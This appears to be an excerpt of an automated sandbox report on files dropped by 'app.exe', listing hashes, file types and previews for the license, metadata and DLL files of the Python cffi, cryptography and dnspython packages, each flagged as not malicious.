                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                          Entropy (8bit):4.935991038897493
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:A/4y0e/M/YL+4JNOG0yPcgte01h/Y9QHY6sUv4fxHOk4/+n0p3oqiFw:00e0/YL3JNOGlPcENSQHY6s5fPOp3o5u
                                                                                                                                                                                                          MD5:DF848F212D07F5BAFD416F76B3FB6F2A
                                                                                                                                                                                                          SHA1:FAF3B19E6B98FEE291F08961E158D932309080A4
                                                                                                                                                                                                          SHA-256:7AC11950E72DF5B45C51716A7B22E7BB34B324D67F065E2938152DD472C4815F
                                                                                                                                                                                                          SHA-512:D2B298E07C012CA96CB8F16C875CCD55B23324DBF7670125A78F62E8AB32FAAD7EEAA363562B78BAF6D41F22EB156702B79B8EC4C06BFA56EAC9964F49935643
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..Except when otherwise stated (look for LICENSE files in directories or..information at the beginning of each file) all software and..documentation is licensed as follows: .... The MIT License.... Permission is hereby granted, free of charge, to any person .. obtaining a copy of this software and associated documentation .. files (the "Software"), to deal in the Software without .. restriction, including without limitation the rights to use, .. copy, modify, merge, publish, distribute, sublicense, and/or .. sell copies of the Software, and to permit persons to whom the .. Software is furnished to do so, subject to the following conditions:.... The above copyright notice and this permission notice shall be included .. in all copies or substantial portions of the Software..... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS .. OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, .. FITNESS FOR A PARTIC

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1144
                                                                                                                                                                                                          Entropy (8bit):4.90107932083797
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:DlfaZMQD9cOHZftDZftWZft2Zft90ZftXZftsZftBZftLZft7neZft7nQQ3MVbQn:DlfaZMQDjaaLiPktjxsxQQ3MZQVR
                                                                                                                                                                                                          MD5:4FBDF69CC0F87558E51CEB1B515B44B9
                                                                                                                                                                                                          SHA1:5DBBB137BBCC32732B377DB6E73B6A344493B2F6
                                                                                                                                                                                                          SHA-256:28FE06DD699ABD18031B00F66FC63F783B0CD58795E9C91C1BA025CF7F83F156
                                                                                                                                                                                                          SHA-512:136AC3257F56BECC0B6736554417E7B33CAE504F2A9E7B5B208F463018FFB41724F3578876C5A86E5166C8FF71D87040C4F27260D8EE8F8058B27ACAF6BD7D56
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: cffi.Version: 1.15.1.Summary: Foreign Function Interface for Python calling C code..Home-page: http://cffi.readthedocs.org.Author: Armin Rigo, Maciej Fijalkowski.Author-email: python-cffi@googlegroups.com.License: MIT.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: License :: OSI Approved :: MIT License.License-File: LICENSE.Requires-Dist: pycparser...CFFI.====..Foreign Function Interface for Python calling C code..Please s

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2884
                                                                                                                                                                                                          Entropy (8bit):5.799739537482471
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:H6CdxrnuX18Fz4xrLQlfQvbGyu/8u1XV+np0tv/bHHzsXwaV3Gu:H63XkMIQvA/8u1XV+p8v/bnz2waV3Gu
                                                                                                                                                                                                          MD5:AEBAB8E90D0E0577C93696E32ADC4469
                                                                                                                                                                                                          SHA1:58510F270BA58AAD0C198A7E4B2C0AD63342301F
                                                                                                                                                                                                          SHA-256:9D5E3598F92DAAAC2E64C2B70413AC5E6DC2B8F0F15C8D18B120DF20FFA96B9C
                                                                                                                                                                                                          SHA-512:F0D1725348F65F64DF648A5708068E42D77A4FFF93806A60CEF145E68A988E1979DC2885BDC3C8D2A16A8747BD7EAC0958A1DDBCA9A3E23B865D591134CC6DE3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_cffi_backend.cp38-win_amd64.pyd,sha256=ZLfjL9a0kvd2PZJyelwjgYzF2juXezJMpxEXrvmdxsc,181248..cffi-1.15.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cffi-1.15.1.dist-info/LICENSE,sha256=esEZUOct9bRcUXFqeyLnuzSzJNZ_Bl4pOBUt1HLEgV8,1320..cffi-1.15.1.dist-info/METADATA,sha256=KP4G3WmavRgDGwD2b8Y_eDsM1YeV6ckcG6Alz3-D8VY,1144..cffi-1.15.1.dist-info/RECORD,,..cffi-1.15.1.dist-info/WHEEL,sha256=M2GQ3lde8oJhlQPj2wbRvnqE3cuovPJasri5X5aCmck,100..cffi-1.15.1.dist-info/entry_points.txt,sha256=y6jTxnyeuLnL-XJcDv8uML3n6wyYiGRg8MTp_QGJ9Ho,75..cffi-1.15.1.dist-info/top_level.txt,sha256=rE7WR3rZfNKxWI9-jn6hsHCAl7MDkB-FmuQbxWjFehQ,19..cffi/__init__.py,sha256=uABQQ4lgzvhAvVhd1_ZA_oSO9T-O93qMod-rs0Ihjb8,527..cffi/__pycache__/__init__.cpython-38.pyc,,..cffi/__pycache__/api.cpython-38.pyc,,..cffi/__pycache__/backend_ctypes.cpython-38.pyc,,..cffi/__pycache__/cffi_opcode.cpython-38.pyc,,..cffi/__pycache__/commontypes.cpython-38.pyc,,..cffi/__pycache__/cparser.cpython-38.pyc,,..cff

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                                          Entropy (8bit):5.060078225325273
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlViZHKRRP+tkKc7DQLn:RtBMwlViojWKxQLn
                                                                                                                                                                                                          MD5:2FB68698B7E4590311FA5AA1ACB8DAB6
                                                                                                                                                                                                          SHA1:F20113D7B4955D24A9E745039FF8A45EA64EC21B
                                                                                                                                                                                                          SHA-256:336190DE575EF282619503E3DB06D1BE7A84DDCBA8BCF25AB2B8B95F968299C9
                                                                                                                                                                                                          SHA-512:72C91352276B943940D560A613BB86ABA56A86AF63A69F34D2797731222D970B305654E30120BE8AA54BEE484BF1E3AF9AC8254684247BBE33BBAC0F5C2A26D1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: false.Tag: cp38-cp38-win_amd64..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info\entry_points.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):75
                                                                                                                                                                                                          Entropy (8bit):4.3073102379831525
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:+Mlc3yMnJpoDRQlY3HnJD:+MyyMnJpORQaJD
                                                                                                                                                                                                          MD5:688CEEBEC0652FC05AC25CAEC3E15043
                                                                                                                                                                                                          SHA1:47683B6E62BBB8296C0D36CB979C2593BCBB6FE1
                                                                                                                                                                                                          SHA-256:CBA8D3C67C9EB8B9CBF9725C0EFF2E30BDE7EB0C98886460F0C4E9FD0189F47A
                                                                                                                                                                                                          SHA-512:D65A67E5E16AA06366D2E8EBAAB1EBD873AB782F5A0D6331F074A48D06EE4051950C4508A5A8E780897BED5C32D41F34E9C8F96DF0D8C4ED61A434AE121581D0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[distutils.setup_keywords].cffi_modules = cffi.setuptools_ext:cffi_modules.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info\top_level.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19
                                                                                                                                                                                                          Entropy (8bit):3.260828171224456
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:xvcDQvn:x5n
                                                                                                                                                                                                          MD5:67EA4A90C355E59A4EB7026E12E6AA43
                                                                                                                                                                                                          SHA1:5A38C6F6B4BA1CF98F2377DB77F55A568089D94C
                                                                                                                                                                                                          SHA-256:AC4ED6477AD97CD2B1588F7E8E7EA1B0708097B303901F859AE41BC568C57A14
                                                                                                                                                                                                          SHA-512:D3FFAFF727C7B534E3DFB0FE8D93011C0B1AD5F4731F7B01B2247AF5A01ED52095234ADF046B6F843CB1A45692E55125F544848B5AE31923150185DB8DA63A0A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_cffi_backend.cffi.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\INSTALLER

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\LICENSE

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):329
                                                                                                                                                                                                          Entropy (8bit):4.603126991268486
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:h9Co8FMjkDYc5tWreLBF/fIKY2mHxXaASvUSBT5+FLkYjivW:h9aWjM/mrGz3IKZvUSBT5+Jxi+
                                                                                                                                                                                                          MD5:8F65F43B29FEA29D36A0E6E551CCA681
                                                                                                                                                                                                          SHA1:DEF52585EE54F0B8841A097B871ABD5F5E94DB10
                                                                                                                                                                                                          SHA-256:970C6BC0FAB59117A0B65E9A6D5F787A991BEBE82AFF32A01C4E1A6E02F4E105
                                                                                                                                                                                                          SHA-512:A5DED62228355C40533E53592164CE9BF511D5F0B98478AD91558626DA02BD6D85185B8DA767338692C60ECB4AB6CBFB2E97EEE6530101A3AFF04CE8087687E8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses..found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made..under the terms of *both* these licenses.....The code used in the OS random engine is derived from CPython, and is licensed..under the terms of the PSF License Agreement...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\LICENSE.APACHE

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11562
                                                                                                                                                                                                          Entropy (8bit):4.476412280491683
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:qf9fG4QSAVOSbwF1wOFXuFJyQtxmG3ep/7rlzKfHbxc+Xq0rhlkT8SgfH2:k1u9b01DY/rGBt+dc+aclkT8Sg+
                                                                                                                                                                                                          MD5:D3DC5ABBDBEF739DCFF4631C8026D71C
                                                                                                                                                                                                          SHA1:DABFE012BF7944B938C95845769414C1D5FA8BB9
                                                                                                                                                                                                          SHA-256:E8DE1A7393457E9C88768B78E6BA790622FBEFB040CE48194C2CB0F1B6D4E9FF
                                                                                                                                                                                                          SHA-512:C8245BD674A2EDB3CE191EC42E701E3E78AEFA3822846604EE0A8FBBB5D62B5372BE07EC8D4D1DD8F6E1DDFE65DAB1136FEE6917FF24445286EFEF99F908ECA2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.. Apache License.. Version 2.0, January 2004.. https://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\LICENSE.BSD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1559
                                                                                                                                                                                                          Entropy (8bit):5.097091815591564
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:NOWJbPrYJ0NCPiB432sVoY32s3EiP3tQHy:gWJbPrYJUNu3J3zVSS
                                                                                                                                                                                                          MD5:07BFF60D258208652DF09D36F7F94844
                                                                                                                                                                                                          SHA1:E37EC74CF1EC6B540A511EA75E04C3429DB39C57
                                                                                                                                                                                                          SHA-256:661D18932DD84BB263A8EE418AB7774ED94EEC33C83FD1DB5B533F78EB774CA4
                                                                                                                                                                                                          SHA-512:049659D6AC6681E209F30E1A6A12BA6118BEB96F032FD3E2583686EA562068E311C61CCD0785B0FC343ECBA094955C972ABCF9AE9B0A4503C56131F1A59A6F83
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Copyright (c) Individual contributors...All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are met:.... 1. Redistributions of source code must retain the above copyright notice,.. this list of conditions and the following disclaimer..... 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... 3. Neither the name of PyCA Cryptography nor the names of its contributors.. may be used to endorse or promote products derived from this software.. without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND..ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED..WARRANTIES OF MERCHANTABILITY AND FITNESS FOR

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\LICENSE.PSF

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2456
                                                                                                                                                                                                          Entropy (8bit):5.053763055088611
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:xUXkp7vXkzpXFlYPXc/XFbwDt3XF2iDPGkvAuXF1f0T2sMtQVHiioTxmynXh2XFQ:KXwDXklHYPXaAt3ZSkYuyCQ4hTcynx26
                                                                                                                                                                                                          MD5:36F8D9BAB4000E435033D3CDB2E85E9B
                                                                                                                                                                                                          SHA1:003076B91D93233F389AB5DB052C04386620BB76
                                                                                                                                                                                                          SHA-256:C2ED0F2724ACA6CEC716CE169FD22C91B79A21FF625C3725D5C71BE1A7977430
                                                                                                                                                                                                          SHA-512:48396B8D7DD14A10C3941788DFED9FF0699C413328FA086CF1D7DCB5E4ED538AEC98541A758B169E271C3DD9BE6056E2EEA0853A6F6DA9C44D865718425DBF9E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and.. the Individual or Organization ("Licensee") accessing and otherwise using Python.. 2.7.12 software in source or binary form and its associated documentation.....2. Subject to the terms and conditions of this License Agreement, PSF hereby.. grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,.. analyze, test, perform and/or display publicly, prepare derivative works,.. distribute, and otherwise use Python 2.7.12 alone or in any derivative.. version, provided, however, that PSF's License Agreement and PSF's notice of.. copyright, i.e., "Copyright . 2001-2016 Python Software Foundation; All Rights.. Reserved" are retained in Python 2.7.12 alone or in any derivative version.. prepared by Licensee.....3. In the event Licensee prepares a derivative work that is based on or.. incorporates Python 2.7.12 or any part thereof, and wants to make the.. derivative work

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5317
                                                                                                                                                                                                          Entropy (8bit):5.089791763663827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DD4FVZ6DWQIUQIhQIKQILbQIRIaMmPktjxsx/1AnivAEYaCjF0ErpklE2jQecwUM:4B6VcPuPfs/univAEYaCjF0ErpklE2j5
                                                                                                                                                                                                          MD5:7A1A0C8010E22C838731CF8728D4E70D
                                                                                                                                                                                                          SHA1:CFF29F6893C6F675A470AE568E19A2BF4394A7F4
                                                                                                                                                                                                          SHA-256:5BB15B05B1055ECCDE3ECC315757980589CD2CBC76219191DBCB022AF9739AFD
                                                                                                                                                                                                          SHA-512:D492F35BBA71FDC8CED8216B657382B6FEC3A4076CB8584088DAD3A29D543BBF8EFA2DACEB2AEBEE983B8ED7F95503B84767D982293CD21FA4C44C992349D7B3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: cryptography.Version: 36.0.2.Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers..Home-page: https://github.com/pyca/cryptography.Author: The Python Cryptographic Authority and individual contributors.Author-email: cryptography-dev@python.org.License: BSD or Apache License, Version 2.0.Project-URL: Documentation, https://cryptography.io/.Project-URL: Source, https://github.com/pyca/cryptography/.Project-URL: Issues, https://github.com/pyca/cryptography/issues.Project-URL: Changelog, https://cryptography.io/en/latest/changelog/.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating Sy

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):15975
                                                                                                                                                                                                          Entropy (8bit):5.53707028238198
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:QX8UKV46ObUjxAsCjEaNfk3T2UbycOJZCBD9G/JLP:QXQII1LmJLP
                                                                                                                                                                                                          MD5:7B5C41217568A045545F76C7844EE9C3
                                                                                                                                                                                                          SHA1:6B15B0B39A6678CADD6B3A867B92396027ABCC4F
                                                                                                                                                                                                          SHA-256:FD17912CEE39BBA4A30357365DCB31D30F72CF89D47EC96B943F0FE158AE9D11
                                                                                                                                                                                                          SHA-512:171E16E21B40A5201F4517D7A807368A76CD7BC13DC2164EEB266FD5ADB1E67DE2A9BFFE35E0974709B39015A8482383DBF532D623EDBE57773E5FD84A1EE3A3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:cryptography-36.0.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-36.0.2.dist-info/LICENSE,sha256=lwxrwPq1kRegtl6abV94epkb6-gq_zKgHE4abgL04QU,329..cryptography-36.0.2.dist-info/LICENSE.APACHE,sha256=6N4ac5NFfpyIdot45rp5BiL777BAzkgZTCyw8bbU6f8,11562..cryptography-36.0.2.dist-info/LICENSE.BSD,sha256=Zh0Yky3YS7JjqO5Bird3TtlO7DPIP9HbW1M_eOt3TKQ,1559..cryptography-36.0.2.dist-info/LICENSE.PSF,sha256=wu0PJySsps7HFs4Wn9IskbeaIf9iXDcl1ccb4aeXdDA,2456..cryptography-36.0.2.dist-info/METADATA,sha256=W7FbBbEFXszePswxV1eYBYnNLLx2IZGR28sCKvlzmv0,5317..cryptography-36.0.2.dist-info/RECORD,,..cryptography-36.0.2.dist-info/WHEEL,sha256=nYCSW5p8tLyDU-wbqo3uRlCluAzwxLmyyRK2pVs4-Ag,100..cryptography-36.0.2.dist-info/top_level.txt,sha256=zYbdX67v4JFZPfsaNue7ZV4-mgoRqYCAhMsNgt22LqA,22..cryptography/__about__.py,sha256=mvSEuUyFuzWcY4NYDTV5O3GQIAuThDJgh7Zh8frIdzo,432..cryptography/__init__.py,sha256=owfnhPuteOJ5wJoJrUfwZO_G-Xset6L0eZ5AWxp6thI,364..cryptography/__pycach

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                                          Entropy (8bit):5.000336540814903
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlViZHKRRP+tkKc5vKQLn:RtBMwlViojWK/SQLn
                                                                                                                                                                                                          MD5:FD7C45A29F7B2371E832F4D0A8B2DB64
                                                                                                                                                                                                          SHA1:D2227C6F4CD8A948E4A4CA6BF2592E9700383EB1
                                                                                                                                                                                                          SHA-256:9D80925B9A7CB4BC8353EC1BAA8DEE4650A5B80CF0C4B9B2C912B6A55B38F808
                                                                                                                                                                                                          SHA-512:AEF644A24B948DC30C2097D53CD5D412C85958E7846720F4E3693F42924597F6924BD24E1B083B2EC57E7BA08C54DBDCA3C1AE73AC2322CD1A575F06BB4D1D90
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: false.Tag: cp36-abi3-win_amd64..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info\top_level.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                          Entropy (8bit):3.7887549139935035
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:DA1JEOv:DUVv
                                                                                                                                                                                                          MD5:6DB3CE9E78C8F56F58CDF1B221C0884B
                                                                                                                                                                                                          SHA1:D8D1BA8EE6C2A5EED9CB39B170EE08012AB41E11
                                                                                                                                                                                                          SHA-256:CD86DD5FAEEFE091593DFB1A36E7BB655E3E9A0A11A9808084CB0D82DDB62EA0
                                                                                                                                                                                                          SHA-512:6F8AB5DA07A237C2BD6DA073A66125EB0CA754389CB84671D68D0DA4122AD6DDA58336900B1100D235814B16EFB970A2C3FBAF91B82366808DAA81A63EAE31AE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_openssl.cryptography.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_openssl.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2997248
                                                                                                                                                                                                          Entropy (8bit):6.677429146317825
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:/xVwASOJGtlqImIU6ipWxOMjB0EZsrU5J0M21SEWPWVWcDcw8xD1XtT2s9mPoOon:Gh+YjmwdkE56Hlw19fOoxr
                                                                                                                                                                                                          MD5:4C0AD2EB9D030A088D00E90D2C57CBE9
                                                                                                                                                                                                          SHA1:83710A36227CE0A277094C902F15A8AA365CEC18
                                                                                                                                                                                                          SHA-256:DEC59340C5854502551980C0FF1E013897D68BE237E7C38BA9EE80C96D3EF7CD
                                                                                                                                                                                                          SHA-512:018E7236F9FE76EF124FF0B65D8832C47480BD31B40F435163566706CAFAA326B5B234024C08AFE80262B87C00310DC6BFA175A36C9F9D0D9A77040998F72F73
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F3.Q.R...R...R...*8..R..`*...R..`*...R..`*...R..`*...R...&...R... ...R...R...R...R...R...+..6P...+...R...+...R...+T..R...+...R..Rich.R..........PE..d.....1b.........." ...... .................................................@............`...........................................*.P... .*.h.....-......p,.0;............-..w...N)..............................M).@.............!..............................text...H. ....... ................. ..`.rdata........!....... .............@..@.data.........*..H....*.............@....pdata..0;...p,..<....,.............@..@.rsrc.........-......B-.............@..@.reloc...w....-..x...D-.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1905152
                                                                                                                                                                                                          Entropy (8bit):6.1897829252472
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:ZGZt2Fr8pA701MwBv/5dcuJ4xNhY5sUQHoxJWpt:ew
                                                                                                                                                                                                          MD5:4DA297B15026197AB45CB5EADD60D2DF
                                                                                                                                                                                                          SHA1:DAC6196E00A505F79156975866C7CA9389AC07EE
                                                                                                                                                                                                          SHA-256:FDC01F1C3EB583F060C8CC2BE5753DA86B55C5672174BA2EE9876E1BBCD54856
                                                                                                                                                                                                          SHA-512:C3CC8BA8FEAD48A6D58BB8E35E9F2C656C2C3433E1BD8CD4EB8726E9E9644345BDD2599A95B82111CFF6D9D74C48BC6DB7E91594DD5BC92D865A104ECECC2AEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..@s...s...s...z.w.u.......q.......|.......t.......p.......w.......p...s.......s..........r......r...Richs...................PE..d.....1b.........." ................0........................................P............`.............................................t...t................P..l............0......`...T.......................(... ...@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata..l....P......."..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info\INSTALLER

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
